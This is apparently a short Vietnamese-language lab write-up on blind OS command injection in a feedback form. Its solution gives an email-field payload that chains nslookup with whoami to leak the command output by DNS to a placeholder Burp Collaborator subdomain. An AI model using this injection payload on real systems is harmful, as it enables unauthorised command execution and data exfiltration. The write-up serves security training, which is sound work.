Lab: Blind OS command injection with out-of-band data exfiltration

Mô tả

Phòng thí nghiệm chứa lỗ hổng blind OS command injection trong chức năng feedback

Ứng dụng thực thi lệnh shell chứa thông tin chi tiết do người dùng cung cấp. Đầu ra từ lệnh không được trả về trong phản hồi. Không thể chuyển hướng đầu ra vào vị trí mà bạn có thể truy cập. Tuy nhiên, bạn có thể kích hoạt tương tác ngoài băng tần với miền bên ngoài.

Mục tiêu: Thực hiện lệnh whoamivà trích xuất đầu ra thông qua truy vấn DNS tới Burp Collaborator.

Giải pháp

Chỉnh sửa tham số email

email=x||nslookup+whoami.BURP-COLLABORATOR-SUBDOMAIN||